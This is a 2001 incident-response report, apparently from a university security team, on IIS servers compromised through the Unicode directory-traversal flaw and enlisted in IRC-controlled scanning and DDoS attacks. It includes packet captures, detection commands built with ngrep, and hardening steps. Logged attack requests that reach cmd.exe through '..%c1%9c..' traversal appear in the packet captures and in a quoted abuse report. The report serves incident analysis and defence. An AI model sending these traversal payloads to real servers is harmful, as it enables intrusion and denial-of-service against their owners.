  3 PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 24

Eleven hours after they first discussed the scanning, the total is up
to 7106:

T 2001/06/06 11:32:30.030794 -> [AP]
  tatus: ][IP:][Port: 80][Found: 34]..:Scanner[128]!~Power
  :][Port: 80][Found: 67]..:Scanner[24]!~Power@XXXXXXXXXXX
  2][Port: 80][Found: 3580]..:Scanner[208]!~Power@ PRIVMSG
  #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 3425]..

Cleaned up, the hosts logged to be scanning from the at this time

XXXXXXXXXXXXXXXXXX [IP:][Port: 80][Found: 0]
XXXXXXXXXXXXXXXXXX [IP:][Port: 80][Found: 67]
XXXXXXXXXXXXXXXXXX [IP: ][Port: 80][Found: 3580]
XXXXXXXXXXXXXXXXXX [IP:][Port: 80][Found: 4080]

The total as of 11:32:29 is up to 7727. It is estimated that during
this period, responses (most failures or error messages) were received
from 388428 web servers off site. (It is not yet known how many
attempted connections were made.)

On July 8, 2001, a DDoS attack can be seen sourced from

T 2001/06/08 02:20:09.406262 -> [AP]
  GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"

I 2001/06/08 02:20:09.430676 -> 8:0 7303@0:1480

The following report was recieved on July 8:

Date: Sun, 8 Jul 2001 18:29:54 -0700 (PDT)
Message-Id: <200107090129.f691Tsa32678@site>
To: abuse@site
From: someone@othersite
Subject: attack

 . . .

Problem or question:
I believe a computer at your site was used to compromise a web
server located at ...

After reviewing the web server logs, I found the follow
repeated entry:

2001-07-06 09:28:18 - GET
/scripts/..\../winnt/system32/cmd.exe 200 - - -

A DNS lookup suggests that IP is a computer on the
XXXX's network. It appears that someone is exploiting a well-known
vulnerability in the IIS web server. The hacker was successfull, as
some files were successfully uploaded to the machine (mirc32.exe).


The host reported to be scanning was scanning that IP range
( at the time (although it was not being logged), so this
likely does correlate:

XXXXXXXXXXXXXXXXX [IP: ][Port: 80][Found: 3580]

Successful exploitation of the Windows IIS Unicode vulnerability
during scanning results in a directory listing from the web server.
These look like the following (as seen using "ngrep"):

# ngrep -q -I "Volume in drive" | less

T -> [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Fri, 06 Jul 2001 04:
  10:26 GMT..Content-Type: application/octet-stream..Volume in drive C h
  as no label...Volume Serial Number is 7C24-D411....

T -> [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Fri, 06 Jul 2001 06:
  50:58 GMT..Content-Type: application/octet-stream..Volume in drive C h
  as no label...Volume Serial Number is 047C-3309....

T -> [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Fri, 06 Jul 2001 07:
  06:49 GMT..Content-Type: application/octet-stream..Volume in drive C h
  as no label...Volume Serial Number is 0CFD-B8DA....

T -> [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Fri, 06 Jul 2001 07:
  13:44 GMT..Content-Type: application/octet-stream..Volume in drive C h
  as no label...Volume Serial Number is CC72-B0EE....
 . . .

Using this signature, a count of the entries logged from traffic
to/from a limited subset of the known compromised systems results in a
count of 9106 off-site systems compromised:

# ngrep -q -I "Volume in drive" | grep " -> " |
 awk '{ print $2;}' | sed "s/:80//" | sort | uniq > exploited-iis
# wc -l exploited-iis
      9106 exploited-iis

The logs examined do not include traffic to/from two of four hosts
known to be scanning, so the 9106 figure is likely an undercount of
compromises resulting from scanning activity on these systems.

On July 10, XXXXX reported another DDoS attack, this time involving
44 systems. The target was XXXXXXXXXXXX, and the total outbound flow
rate exceeded 50 Mbps for over two hours.

In all, the following systems have been identified as scanning,
relaying IRC traffic, or involved in DDoS attacks:

     [71 hosts deleted]


CERT Advisory 2001-11 contains information on preventative measures:


In addition, XXXXXX relayed the following preventative measures for
IIS servers to pass along to administrators.

There are a couple of simple steps that NT admins should take that
will significantly increase the "degree of difficulty" in
compromising NT boxes - doing these things can at least reduce the
number of incidents we respond to:

1. On an IIS server, always change the location of the inetpub
directory and it's subordinates (wwwroot, ftproot, etc.) from the
default (C:\InetPub) to a different logical partition. The "../.."
attack's syntax is not capable of changing drives to access

2. Restrict anonymous access to the registry. This greatly reduces
the amount of information available to a non-authenticated user about
the target system. To do this in Windows 2000:

   a. In Administrative Tools, open Local Security Policy.
   b. In the Tree Window, expand Local Policies and choose Security
   c. Double-click "Additional restrictions for anonymous connections".
   d. In the Local Policy Setting dropdown, choose "No access without
       explicit anonymous permissions".

In Windows NT 4, a registry hack needs to be applied:

   Value: REG_DWORD RestrictAnonymous = 1

There are some consequences to using the anonymous restrictions,
which mostly apply to Domain Controllers. Use of these settings on
DC's requires that the admin read up on them.

- --
Dave Dittrich Computing & Communications
dittrich@cac.washington.edu University Computing Services
http://staff.washington.edu/dittrich University of Washington

PGP key http://staff.washington.edu/dittrich/pgpkey.txt
Fingerprint FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5

Version: PGP 6.5.8
Filter: gpg4pine 4.1 (http://azzie.robotics.net)


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

Relevant Pages